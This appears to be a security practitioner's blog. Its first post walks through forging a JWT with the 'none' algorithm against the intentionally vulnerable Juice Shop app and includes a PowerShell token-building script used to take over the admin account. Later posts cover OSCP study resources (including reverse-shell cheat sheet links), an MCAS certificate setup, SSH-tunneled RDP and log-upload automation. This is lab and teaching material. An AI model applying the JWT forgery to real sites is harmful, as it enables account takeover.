Practicing JWT Attacks Against Juice-Shop

I love attending the sessions put on by Black Hills Information Security when I can. Last week, the session was on JWT attacks, which I found very interesting. I wanted to see if I could mimic part of the demonstrated attack, reproduce it and then leverage it into elevated access on a site. The BHIS session on JWT attacks from 6/18/2020 can be found here: https://www.youtube.com/watch?v=muYmiEtPL8U&t=2490s

For this lab, I downloaded Juice Shop which is intentionally vulnerable to many of the top OWASP attacks. Once I had the app up and running, I explored the app some to enumerate users. In the session we didn’t get to see where the admin user was exposed – turns out this was super easy to find. After poking around in the site I decided to try and attack a password change for the admin account to see if I could muster a complete account takeover.

Step 1: Install Juice-Shop

I already had an Ubuntu 18.04 LTS machine running in the lab, so I just wanted to add the app here. I tried the NodeJS and NPM route first, but I ran into some snags and I did not want to invest a ton of time troubleshooting. I decided to go the Docker route and I was able to get this working on the first try.

Juice-Shop: https://github.com/bkimminich/juice-shop#docker-container

Docker installation directions: https://docs.docker.com/engine/install/ubuntu/

I followed the documented steps verbatim:
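For reference, the Docker steps from the Juice Shop README boil down to two commands, something like this (as documented at the time – verify against the repo). The app then listens on port 3000 of the Docker host:

    docker pull bkimminich/juice-shop
    docker run -d -p 3000:3000 bkimminich/juice-shop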

And I was able to browse the site:


Step 2: Recon

There is a ton to explore on this site. For the purposes of this post, the only necessary recon is to open the Apple Juice product, look at the product review and note the username of the person that left the review:


admin@juice-sh.op seems like a “juicy” target (pun intended).

Ok, now onto trying to exploit a JWT token vulnerability…

Step 3: Identify Where/What to Attack

    1. I need an account. If I have an account, I can look at how the JWT tokens are constructed and then I can use that to try and craft a new token as my victim user. I went to login – created a new account named hack@hack.com w/ a password of P@ssw0rd!

    2. I then logged in with the newly created credentials:

    3. I took a look at all of the traffic in the Burp proxy log and noticed calls to the /rest/user/whoami endpoint with my JWT token:

    4. The tokens are the same in the Authorization header as well as in the cookie. I chose the bottom /rest/user/whoami GET and sent it to Repeater
    5. Now I need to learn whether to attack the Authorization Bearer token, the token in the cookie, or both
      1. I added a letter to the auth header (basically breaking it) – no change on send
      2. I added a letter to the cookie and it broke – this is the one that matters

Before:

After:
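If you would rather script that sanity check than eyeball Repeater diffs, a quick sketch along these lines does the same thing (PowerShell; the token cookie name and port 3000 are Juice Shop defaults – adjust for your instance):

    # Hypothetical sanity check: send the JWT in both places, then mangle
    # one at a time to see which one the endpoint actually validates
    $jwt = '<paste the captured JWT here>'
    Invoke-RestMethod -Uri 'http://localhost:3000/rest/user/whoami' `
        -Headers @{ Authorization = "Bearer $jwt"; Cookie = "token=$jwt" }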

Step 4: Craft the JWT Attack Token

  1. This is a signed JWT – I can tell because it’s <base64URLencoded-header>.<base64URLencoded-payload>.<base64URLencoded-signature> – 3 base64url-encoded strings separated by periods:

  2. I copied the header into Decoder, decoded it as Base64, changed “RS256” to “none” and then encoded it as base64. The new string is my new header. I pasted this into a document off to the side for later use


    ** NOTE – the trailing “=” padding will break the header. These characters need to be dropped when copying and pasting!

  3. Next, I grabbed the payload and dropped that into Decoder, modified the email address and then re-encoded it as base64:

    And changed it to this and then encoded it as base64

  4. I copied the new payload and then pasted the new header and payload into Repeater. I dropped the signature (since we now have “none” in the header) and hit send:

    No luck – this is where I had to play with the headers a bit to get this to work consistently. In order to get the response I wanted, I ended up removing HTTP headers until I got the result.

    Modified request (missing some headers – most notably the bearer token):

    Result:

Success! That said, I doubt the id of the admin user is 18 (that is the id for the hack@hack.com account I created). Most likely, admin has an id of 1, so I changed that in the token, re-encoded and resent. Result:
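If you prefer scripting the token surgery over juggling Decoder tabs, here is a rough PowerShell sketch of the same steps (my own helper names, assuming the header/payload values shown above – adjust the -replace patterns to your actual token):

    # Base64url helpers - base64url drops the '=' padding and swaps +/ for -_
    function ConvertTo-Base64Url([string]$Text) {
        $bytes = [Text.Encoding]::UTF8.GetBytes($Text)
        [Convert]::ToBase64String($bytes).TrimEnd('=').Replace('+','-').Replace('/','_')
    }
    function ConvertFrom-Base64Url([string]$Data) {
        $b64 = $Data.Replace('-','+').Replace('_','/')
        switch ($b64.Length % 4) { 2 { $b64 += '==' } 3 { $b64 += '=' } }
        [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64))
    }

    $token = '<paste the captured JWT here>'
    $parts = $token.Split('.')

    # Swap the algorithm to none and the victim identity into the payload
    $header  = (ConvertFrom-Base64Url $parts[0]) -replace '"alg":"RS256"','"alg":"none"'
    $payload = (ConvertFrom-Base64Url $parts[1]) -replace 'hack@hack\.com','admin@juice-sh.op'

    # Unsigned token is header.payload. - note the trailing dot (empty signature)
    "{0}.{1}." -f (ConvertTo-Base64Url $header), (ConvertTo-Base64Url $payload)

The id swap works the same way – just -replace the id value in $payload before re-encoding.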

Step 5: JWT Attack

  1. I now have a JWT that is accepted by the /rest/user/whoami API. With that, I need to see if other parts of the application will accept the token, and I chose to attack the password change functionality. I went into password reset on my account to change the password:

    And changed the password to “password1”:

  2. Looking at this traffic in Burp:

  3. I simply replaced the Authorization token with the newly crafted JWT and replaced the entire cookie in this new request with the one from the previous Repeater request:

    I get a 200 back and the password is shown within the returned payload. Turns out this is the MD5 of the password I did in fact just set. Now, can I log in with the creds?

  4. Success!

I was able to change the password for the admin@juice-sh.op account and log into the app with the new credentials!

Key takeaways:

  1. Base64url encoding for the headers
    1. Drop the trailing “=” or the header will break
  2. Play with the headers until you get a result you like

Good stuff!

Security, Web Attacks

OSCP – My Beginning, My Fall, My Rise and My Resources – Just Like Batman

I officially got notice today (5/26/2020) that I passed my OSCP exam. I am going to keep this light with a focus on study resources, as there are many (and better) writeups on how to tackle the OSCP. It took me about a year and two test attempts, but I finally made it. This was the hardest singular exam I have ever taken, as the breadth of knowledge required and my starting point made this quite a significant task. My boss provided the funds for me to purchase the course materials last summer (2019 – thanks Tavis!) and I studied/focused on the book material right out the gate…huge mistake. I let my lab time expire and barely touched it. At the time of expiration, I had popped a single low privilege shell using SQLMap (not even allowed on the test) and had zero additional success. I knew I was nowhere near being ready, so I turned to forums and found folks were prepping by working with machines from Vulnhub and Hack The Box. Prior to my first attempt at the test (Feb 2020) I did purchase 15 days of lab time to see what I could do, and I had quite a bit of success. I attempted and failed the test in Feb 2020 due to time management – shocker! This is a common reason folks cite for failing and I now wholly understand why. In April of 2020 I attempted a second time with a different strategy and came out on top!

Resources

I took a lot of guidance from this post: https://forum.hackthebox.eu/discussion/1730/a-script-kiddie-s-guide-to-passing-oscp-on-your-first-attempt

Here are the materials I really used to prep for the exam:

  1. Read the book
  2. Attacked the lab (especially with the second block of time)
  3. Watched the videos – sort of
    1. Probably could have gotten more value here
  4. Hack The Box – retired machines
    1. As many of the solved easy-medium ones as I could
    2. Requires the VIP subscription but this is like $120/year
  5. VulnHub – OSCP-Like
    1. https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms
  6. Buffer Overflow Practice
    1. https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
  7. IppSec videos
    1. Watched all CTF Windows Easy
    2. Watched most CTF Windows Medium
  8. Rana Khalil’s writeups
    1. These are amazing!!!

My Study Strategy

I really took to heart the blog post from LRNZO above and followed the guidance. For some reason, it really resonated with me when I read it, so I settled on that for my strategy. I dove in and heftily focused on OSCP-like machines across HTB and VulnHub. I spent very little time using or learning Metasploit – just the basic commands needed to attempt an exploit or to use the multi-handler. My intention was to conquer all of the machines without Metasploit, or at least attempt them without having to use it. In retrospect, I think I should have spent a little more time here and learned the tooling better, as I do think one of the test machines I ran into was potentially meant to be cracked with Metasploit and I didn’t end up getting that one. I really got the most value from the retired HTB machines and the writeups. I would attempt these machines myself and then read the writeups afterward to see if there were things I could have done differently. It is always pretty humbling to see how badly you struggle doing something and then watch something like an IppSec video on it where he shows you 3-4 different ways to accomplish it. The best/craziest part about learning all of this really comes down to the Einstein quote – “The more I learn, the more I realize how much I don’t know”…so very true. This is also where Rana Khalil’s writeups were awesome – I loved her approach on recon and how concise her writeups were.

Key element for sure – focus on the basics and recon, recon and then recon some more. Enumerate. Find the nooks and crannies until something presents itself. I cannot tell you how many machines I have solved now when I have given up all hope (almost) and then tried just one more thing…and then the lid blows off. This even happened during the test. I am coming to find that mindset is key and mental endurance (especially during the test) is a necessity.

Time Management

Test Take #1: Wow did I fail on this the first time around. I read a lot of blog posts on how to tackle the test. I decided to go with the early morning start – get the test rolling as I would my normal work day, hit the BOF right out the gate, plan to have 60-65 pts by dinner, take a break to hang with the family, crack the rest of the machines by midnight and get a good night’s sleep with a score of 100 – heh, that didn’t happen. Rather, I hit a snag with the BOF, spent an extra 2-3 hours flummoxed there (something silly), started reconning the other machines late, ended up in a mental tailspin and completely defeated myself by late evening. I think I may still have only had the BOF (25 pts) at midnight and that was largely due to my approach, my frustration and my deviation from the game plan. I kept looking for the quick easy win rather than working the recon and making sure I was not missing something. I had a printed-out playbook on what to do and how to recon based on service enumeration which went completely out the window as I sought homerun after homerun. You have to go into the test with a game plan and STICK TO IT. In the wee hours of the morning, I was exhausted and mentally defeated. If I had submitted the report, I think I would have been at around 55 pts when the clock ran out.

Test Take #2: The approach on this attempt was way different. First, a lot of the blog posts suggest doing the BOF right out the gate and getting it out of the way – I say nay to that. Rather, make sure you are as comfortable with it as you can be and do the BOF when your brain is fried. That is why you practice anything – so you develop the muscle memory and can execute it in your sleep. I took the opposite approach as to when to start this time as well – rather than starting with my normal day and then spending my exhausted time in front of the keyboard when it was dark outside and I would normally be asleep, I started my test at 6PM so that I would spend my truly exhausted time during the day when the sun was out and I would normally be working. 6AM came around the next morning, I was still chugging, I put on a pot of coffee and I pulled a true all-nighter, never actually having my head hit the pillow during the test. I only ended up with 70 pts (I was oh so close on another machine right as the clock ticked off) but the point is that I was actually still going strong(ish) at the end.

For this, you have to do what you think will be right for you, however, for me it came down to figuring out how I was going to be able to stay positive enough to defeat Debbie Downer when she came knocking. Fatigue is a mighty foe and not to be trifled with.

Advice

I’ve been hit up a few times now by folks looking to start their OSCP/pentesting/cybersecurity journey, asking me how to get started. I would say that the OSCP is maybe not so much where to start your cybersecurity trek; however, if you are looking specifically to get started with pentesting and learning this tooling, then the most important thing to understand is that it is totally OK to fail…but not too fast. You need to feel the pain. Don’t hit the walkthroughs, blogs or forums too fast when working a machine, but don’t wait forever either. Make sure you are truly stuck and then go and get the answer you need to move on to the next step. The whole “Try Harder” crud is garbage (IMO) – smashing your face into the same wall over and over does not teach you anything. Do your best to make sure you are truly at a dead stop, then go get the answer you need, make sure you understand what it took to overcome that block and tuck it away in your utility belt for next time (aka learning) – this is especially true early on. If you could already solve all of these machines and you had infinite time then “Try Harder” might apply; however, thinking back to math in HS and college, there was a reason the odd numbered questions had their answers in the back of the book….

Additional Resources

These are ones I just want to call out as coming in very handy in prep for the test. There is so much to learn, and so many resources out there provide invaluable insight and capabilities, that it would prove impossible to list them all. The most important resource is most likely your favorite search engine.

Pentestmonkey Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Nishang: https://github.com/samratashok/nishang

Crackstation: https://crackstation.net/

GTFOBins: https://gtfobins.github.io/

Footnote

I do have to add a special footnote here and say thanks to my wife. She watched the kids while I studied and had to tackle them fully on her own the full day of the test. With a 3 and 7-year-old at home, no small feat and this was in the midst of shelter at home. Thanks Erin!

OffSec, OSCP, Security

MCAS – Device Identity via Certificates and Progressive Web Apps

I have a customer scenario where we needed to explore leveraging certificates in order to identify corporate Windows 10 machines, for the purposes of preventing corporate data from being downloaded from O365 services to non-corporate assets. There are a few different ways this can be tackled; however, the other routes proved to be dead ends for various technical reasons, so we landed on leveraging device certificates via MCAS in order to control data spillage.

https://docs.microsoft.com/en-us/cloud-app-security/proxy-intro-aad#managed-device-identification

Utilizing device identity via MCAS with certificates does mean that your user traffic for the devices with certs (and without) will have to go through Conditional Access App Control (the reverse proxy) for all sessions. It took some trial and error to get this to work. I do want to point out that this method is technically not supported for O365 services, as proxying traffic for O365 can impact the user experience and the SLAs.

Scenario

  1. Hybrid Azure AD Joined machines will be allowed to access corporate resources unfettered
  2. Corporate devices without HAADJ will have a certificate deployed to them. The certificate will be used in a session control policy via MCAS to allow the device to download corporate data from O365
  3. Devices without certificates (corporate or otherwise) will be treated as untrusted. They will still be allowed to access corporate data (as allowed by other conditional access policies outside of the scope of this blog) but they will not be allowed to download data from O365

Hybrid Azure AD Join: https://docs.microsoft.com/en-us/azure/active-directory/devices/hybrid-azuread-join-managed-domains

HAADJ is a function of AAD and AAD Connect where machines are effectively synced from your on-prem AD into AAD. If a device has been synced, that information can be leveraged within conditional access policies as a piece of criteria during authentication. At this point, you can decide to request additional controls (such as MFA), whether to allow or block access, and even potentially drop the session into the MCAS reverse proxy for additional session control. In order to cover these scenarios for my lab, I configured two conditional access policies – the first policy enables the scenario I want to allow and the second policy blocks the rest.

Policy #1 – ITOp5 – RP – Block Download without Cert

My target user is ITOp5 in my lab. This is a standard user account that has been synced from the on-prem AD via AADC.

Apps – I went lazy for this and simply selected all apps

Conditions

Only targeting Windows since this was my client’s use case

Only allowing browser – the reverse proxy only works with the browser. Since that is the case, we are only going to allow browser-based access.

For device state, we want to include all devices…

But exclude devices that are actually compliant (this is a 2-fer and how we catch all 3 scenarios with 2 conditional access policies)

In this case, I am only granting access, but additional controls and requirements could be implemented

Lastly, I am putting my user into Conditional Access App Control aka the reverse proxy if the above criteria is met

Policy #2 – ITOp5 – Block Non Browser on Non Compliant Devices

This policy is almost exactly the same with two exceptions. The first exception is Client apps – in the allow policy this is set to Browser. In the block, this is set to everything else

Lastly, rather than grant, the policy is set to block

With these CAPs, folks coming in on a Windows machine either need to be marked compliant via Intune or have their devices HAADJ in order to have full access to all resources and to be able to use thick client apps. Everyone else is going to be routed into the reverse proxy. For the proxied users, if they have a certificate, they will be allowed to download data to their endpoint. If they do not have the certificate, the user will be forced to leverage the cloud-based tools within O365 to collaborate and work with corporate data.

MCAS – Session Control Policy

Configuration here is straightforward. It is a Control file download (with DLP) policy. For the criteria, it is going to specifically target my test user and block if the user does not have the certificate. Given that, the criteria are targeted to the devices that do not have a valid certificate

For the file criteria I could get specific and try to stop content with PII, financial data, HIPAA, etc., but I really want to stop all egress in order to prevent non-corporate devices from coming under potential eDiscovery. With that, the criteria for what I am looking for is left blank to catch all content

Lastly, the policy is set to block with a custom block message. Notifications are optional

This is it! Other than getting certificates to the endpoints, a HAADJ machine should be allowed to connect regardless of app. An unmanaged device should be routed into the reverse proxy and data egress should be blocked.

I verified this was the case in the lab with this configuration, and I have the behavior I want.

Device Certificate

For the root cert that goes into MCAS, it just needs to be the base64 encoded public cert (.CER) file that you import. Simply export, import and done.

https://docs.microsoft.com/en-us/cloud-app-security/proxy-intro-aad#client-certificate-authenticated-devices

The device identification mechanism can request authentication from relevant devices using client certificates. You can either use existing client certificates already deployed in your organization or roll out new client certificates to managed devices. You then use the presence of those certificates to set access and session policies.

Not a ton of detail – this suggests that a device certificate on the endpoint should be sufficient. There is a little more detail further in the article that suggests an SSL certificate. From my testing, I have found that the ultimate requirement for this certificate itself is that it has Client Authentication in the Extended Key Usage. Lastly, the certificate needs to be installed into the user’s personal store – the local machine store will not work.

Walking through the process using a MS PKI to deploy the cert – this is probably not the most efficient and is definitely not the route you would go to deploy certificates in bulk to end users. This is purely the process I used and I wanted to document it here to show how I get a cert manually into the end user store.

Certificate Authority Template

I duplicated the Web Server template, added Server and Client Authentication in for Extended Key Usage and then published the template for use within the CA.

End User Certificate Request

I am doing this manually with a certificate signing request. On the endpoint, create a request.ini with the following and run the certreq command
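For illustration, a minimal request.ini for this purpose looks roughly like this (a sketch with a hypothetical subject – the parts that matter are the user key store and the Client Authentication EKU), with certreq generating the CSR from it:

    [NewRequest]
    Subject = "CN=ITOp5"        ; hypothetical subject - use your own naming
    KeySpec = 1
    KeyLength = 2048
    Exportable = TRUE
    MachineKeySet = FALSE       ; FALSE = keys land in the user store, which is what MCAS needs
    RequestType = PKCS10

    [EnhancedKeyUsageExtension]
    OID = 1.3.6.1.5.5.7.3.2     ; Client Authentication

    certreq -new request.ini csr6.req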

I took the output in the csr6.req file and pasted it into the CertSrv site, requesting a certificate utilizing the custom Web Server template I created with Client and Server Authentication in the EKU

I downloaded the .cer file, copied it to the target workstation and then ran the following to import the cert directly into the user’s personal store
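The usual command here is certreq -accept, which installs the issued cert into the current user’s store and marries it back to the pending request/private key (a sketch – csr6.cer standing in for whatever you named the downloaded file):

    certreq -accept -user .\csr6.cer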

At this point, we can validate that the browser is able to see the certificate by going into Settings -> Search for Certificates

I can also see the certificate if I go into the certificate manager and look in the user’s personal store

Now, when I browse to O365 I hit the login page, I provide my username and then password. Immediately post password, I get the following

I select my certificate and hit OK. This allows me into O365. At this point, I can browse anywhere in the cloud service and download files since I now have a valid certificate that I presented immediately post-authentication to the reverse proxy. Given how the conditional access policies are configured, this prevents all non-browser apps from accessing the services. This means that only machines that are HAADJ or Intune managed (and compliant) are allowed to use thick client applications. Machines outside of that are allowed to access O365 but are not allowed to download content unless they have the certificate. Even the machines with the certificate are forced to use the web apps for O365, as applications like Outlook, Teams, OneDrive sync, etc. are not allowed to connect directly to the service. These users with the cert would be able to download content directly to their machine and work on it offline, but they would then have to re-upload the content via the browser when it came time.

Progressive Web Apps

PWAs introduce an interesting option for enabling productivity while still flowing the traffic through the reverse proxy and controlling data egress. This is very slick, and I use PWAs for sites/apps both for O365 and otherwise.

https://docs.microsoft.com/en-us/microsoft-edge/progressive-web-apps-edgehtml/get-started

That’s the dev resource for PWAs, so what does this actually mean for O365? You can pin specific sites (like Outlook and Teams) as PWAs on a machine. They are still web apps, but they get better performance, extra caching and all the nice little tweaks that make them _almost_ as good as the thick client. Keep in mind, the _almost_ is my opinion and it does depend on the app. For example, I use a music streaming service on my home machine. The app for the streaming service is a resource hog. I pin the PWA for it instead and it is significantly lighter on resources. I think each web app (both in and out of the MS ecosystem) warrants exploring.

Edge Chromium

Summary

Requirements for leveraging Device Certificate via MCAS to block downloads of corporate data to unmanaged devices

Device Certificate Requirement

  • Certificate has Client Authentication in the Extended Key Usage
  • Certificate is located in the user’s personal store

Conditional Access

  • Non-browser apps are blocked for the targeted users – required, or the session will not be routed into the reverse proxy, which negates using the certificate to allow/block downloads
  • Browser access is set to be granted through Conditional Access App Control

MCAS Session Control Policy

  • Block downloads of all data to devices that are not tagged with having the certificate

Resultant Scenario

  • All users off network and/or in scope would be forced to use web-based clients for a connected experience. This means thick client apps such as Outlook, OneDrive Sync, Teams and even tools like Excel and Word will not work when connecting directly to cloud data
  • All users with a valid certificate would be able to download the data and work with tools like Word and Excel in an offline mode and then reupload the data into SharePoint or OneDrive
  • Progressive Web Apps provide a nice alternative to thick clients, but they do not allow local disk access
  • End users would still have full access and be able to use the web-based collaboration tools within the cloud without allowing egress of data to their endpoints

Happy MCAS-ing!

Hack Job, MCAS

Secure RDP – Using SSH Tunneling With Built-In Windows Features

So…

Who knew? I didn’t. This is the screen for Settings -> Apps and Features -> Optional Features for both Windows Server 2019 as well as Windows 10. This was a very pleasant surprise. With that, I am always looking for a way to connect to my home lab that is:

  1. Secure
  2. Minimizes the required HW/resource footprint

I was previously using Remote Desktop Services along with Azure App Proxy (here) to publish access securely, however, this meant that I had to have the RDS and AAD App Proxy footprints in my lab. I only have 48GB of RAM in my lab and I run out all the time – running AD along with a few additional services for demo purposes can really put the squeeze on quick. Stumbling across OpenSSH built right in seems like it might be the solution for which I have been looking. With that being said, the documentation….has room for improvement. I did finally find the answers I was looking for and was able to leverage SSH tunneling in order to RDP into my lab. I love this!

** Requires Windows 10 or Server 2019

I am going to save you some time and steer you away from the official docs. The documentation you need to get started is in an answer on Stack Overflow here:

https://stackoverflow.com/questions/16212816/setting-up-openssh-for-windows-using-public-key-authentication and was provided by this person: https://stackoverflow.com/users/31782/n0rd

High level, here are the condensed steps from his answer:

On the server:

  1. PS> Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0 or through the UI (pictured above)
  2. Start the services
    1. PS> Start-Service ssh-agent
    2. PS> Start-Service sshd

On the client:

  1. Mkdir .ssh in the C:\Users\<Username>\ directory. This is where the keys are going to land. For demo purposes, I am going to use administrator so the path would be C:\Users\Administrator\.ssh
  2. CD to that directory using CMD or PS
  3. Run ssh-keygen
    1. Give a password or not for the key file. I chose to do so for the sake of security
  4. In the window, run ssh-add .\id_rsa (assuming this is the private key that was generated). You will get prompted for the password – go ahead and enter it. This makes the key securely available without being prompted for a password every time you use it to connect from this machine
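Condensed, the client-side setup is just the following (run as the connecting user; id_rsa is ssh-keygen’s default output name):

    mkdir C:\Users\Administrator\.ssh
    cd C:\Users\Administrator\.ssh
    ssh-keygen
    ssh-add .\id_rsa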

The client is now configured.

Back to the server:

  1. Log into the server as the user you are wishing to connect as – for demo purposes this is the administrator account
  2. Mkdir C:\Users\<Username>\.ssh – in this case, C:\Users\Administrator\.ssh
  3. Copy and paste the contents of the .pub file from the client into a file named authorized_keys here in this directory on the server
  4. Right Mouse Click on authorized_keys and go to properties
  5. Properties -> Security -> Advanced -> Disable Inheritance
  6. There should be exactly 2 perms assigned to this file (probably has 3 right now).

    Get rid of the extra. You should have SYSTEM and your user account – in this case Administrator. Get rid of any other entries such as Administrators (group) here.

  7. Apply, Ok, Close, or whatevs to save the changes
  8. Open C:\ProgramData\ssh\sshd_config with notepad or your text editor of choice
  9. Comment out the bottom 2 lines (shown in the snippet after this list)

    NOTE: Put a # at the beginning of each line to comment it out

  10. Find this line and make sure it is not commented out:

    PubkeyAuthentication yes

  11. Save and close
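For reference, on a stock Windows OpenSSH install those bottom 2 lines are the administrators Match block. After the edits in steps 9 and 10, the tail of my sshd_config looked roughly like this (assuming the default file – yours may differ):

    PubkeyAuthentication yes

    #Match Group administrators
    #       AuthorizedKeysFile __PROGRAMDATA__/ssh/administrators_authorized_keys

Commenting out the Match block is what makes sshd honor the per-user authorized_keys file for administrators.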

At this point, you can SSH in with the key file. Sweet! For my lab, in order to further secure it, I want to make it such that you HAVE to use the keyfile in order to connect.

  1. Reopen sshd_config with notepad
  2. Find this line, uncomment it and set it to no:

    PasswordAuthentication no

  3. Save and close
  4. PS> Restart-Service sshd
    • This may or may not be necessary

Now, you HAVE to use the private key (which exists only on your machine) to SSH to the server. Sweet!

The next step depends on your environment and which port you want to use. For me, I grabbed a random high port on my router and port forwarded it to 22 on my server. For demo purposes, I used 47474 (which I later changed). Now, on my machine I can either SSH to the Windows server (which throws a CMD shell by default) or I can fire up tunneling to RDP into any machine in my lab.

Just doing a straight SSH:
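That invocation is just the standard client command, something like this (MyPublicIp standing in for my real lab IP):

    ssh -p 47474 administrator@MyPublicIp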

Now, to do RDP instead we just need to fire up the tunnel with a slightly different command
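Reconstructed (the -L local forward is the important part), the command looks like this:

    ssh -f -N -L 12345:HV01:3389 -p 47474 administrator@MyPublicIp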

Note the -f and the -N along with the 12345:HV01:3389. MyPublicIp is the public IP I currently have for my lab, omitted for security:

-f = fork into the background after authentication
-N = do not execute a remote command (we only want the tunnel)
12345 = the local port the tunnel listens on (the port we will RDP to)
HV01 = the lab server to which we want to RDP
3389 = the RDP port on the target server

When you run this command, a listener (:12345) is established on the local machine which is routed through the secure tunnel (:47474 -> :22) to :3389 on HV01

RDPing to my localhost on port 12345 – MSTSC prompts me for creds. I provide valid creds for the HV01 machine in my lab and:

Boom. We now have a secure tunnel that can only be accessed with the private key on my local machine which then allows me to RDP into my lab.

Hack Job, Security, Uncategorized

MCAS Lab – Auto Updating Discovery Data with Sample Data

Maybe you have a need to demo Microsoft Cloud App Security to your customers. Maybe you have a need for a lab that has constantly updated discovery data. Maybe creating a snapshot report every 30 days is good enough…maybe not. For me, I want the Discovery Dashboard to be populated with fresh data for demo purposes, and the logs from my home router just don’t cut it – GBs of traffic to Netflix and Hulu and a taste of Twitter don’t make for that compelling of a demo. I wanted a way to auto-update the global logs on a recurring basis in a “set it and forget it” manner.

  1. Deploy the log collector (Ubuntu FTW)
  2. Grab the Code and Config
  3. Create the Scheduled Task
  4. Forget it

#1 Deploy the log collector

https://docs.microsoft.com/en-us/cloud-app-security/discovery-docker-ubuntu

Critical Pieces of information:

  1. Machine Name – UBTLOG01
  2. Machine IP – 192.168.50.163 (this isn’t my real IP but I’ll keep it consistent for the purpose of the doc)
  3. Log Collector Data Source – name I gave the data source in the MCAS portal
  4. Log Collector Data Source Type – Palo Alto – PA Series FW
  5. Data Source Type – FTP

MCAS Portal – Log Collectors

Now that the log collector is deployed, we can move on to the code and the scheduled task

#2 Code and Config

Download from GitHub here
Download the code and drop it into the folder from which you want the script to run and work.

I like using the CredentialManager module to register and hide credentials on my PowerShell automation machines.

PowerShell Gallery: Credential Manager 2.0
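As a sketch, registering and later retrieving the FTP creds with that module looks like this (MCAS is just the target name I chose; the account/password here are hypothetical):

    # One-time registration on the automation machine
    New-StoredCredential -Target 'MCAS' -UserName 'discovery' -Password 'P@ssw0rd!' -Persist LocalMachine

    # What the script does at runtime
    $cred = Get-StoredCredential -Target 'MCAS'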

Line 44 of the PS1 code has the path to the .env file (really just JSON) that contains all of the environment variables necessary to run the script. Here’s the format of the .env file:

{
    "LogCollectorVMName": "UBTLOG01",
    "LogCollectorHVHost": "DC03",
    "LogCollectorIP": "192.168.50.163",
    "LogCollectorDSName": "PaloFW-TSTLab",
    "CredManTarget": "MCAS",
    "LogfilePath": "E:/Jobs/MCASLogCollectorUpload"
}
LogCollectorVMName – Name of the Ubuntu machine
LogCollectorHVHost – I am using HyperV to host the log collector machine
LogCollectorIP – IP Address (LAN) for the Ubuntu machine
LogCollectorDSName – Data Source name assigned during creation in MCAS
CredManTarget – the Credential Manager target name used to retrieve the FTP credentials for pushing the log files
LogfilePath – path to all of the artifacts – since this is a JSON file, use / instead of \ in the path
  1. Install Credential Manager on your worker machine
  2. Register the ftp credentials in a target named MCAS (match your .env file)
  3. Drop the script and the .env file in the LogFilePath you assigned earlier – I am using a path of E:\Jobs\MCASLogCollectorUpload
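Conceptually, the guts of the script boil down to something like this trimmed sketch (not the actual GitHub code – names come from the .env above):

    # Make sure the collector VM is up (the real script also powers it back down)
    Start-VM -Name 'UBTLOG01' -ComputerName 'DC03'

    # Push the sample log to the collector's FTP, into the data source folder
    $cred   = Get-StoredCredential -Target 'MCAS'
    $client = New-Object System.Net.WebClient
    $client.Credentials = $cred.GetNetworkCredential()
    $client.UploadFile('ftp://192.168.50.163/PaloFW-TSTLab/sample.log', 'E:\Jobs\MCASLogCollectorUpload\sample.log')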

#3 Scheduled Task

Import the provided scheduled task and tweak it to your environment

  1. Fix the user

  2. Tweak the trigger (if wanted)

  3. Set the paths for the Action

    Program Path: %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe

    Arguments: full path to the .PS1 file – E:\Jobs\MCASLogCollectorUpload\MCAS_Upload-Log.ps1

    Start in – path to all the files – E:\Jobs\MCASLogCollectorUpload

#4 Forget it

At this point, run the scheduled task to ensure it is working. The PS1 script will even turn the VM on and off on-demand so that you can conserve the VM resources rather than having the Ubuntu machine running 24×7. If you are fast enough, you can FTP to the log collector yourself and see the file land – cd into the folder with the name of the Log Collector Data Source:

Once the file is uploaded, it will disappear from this folder on the FTP server. At that point, check in the governance log within MCAS and you should see this:

Now, your MCAS demo environment will stay fresh with recurring sample data.

Automation, Hack Job, MCAS, PowerShell, Security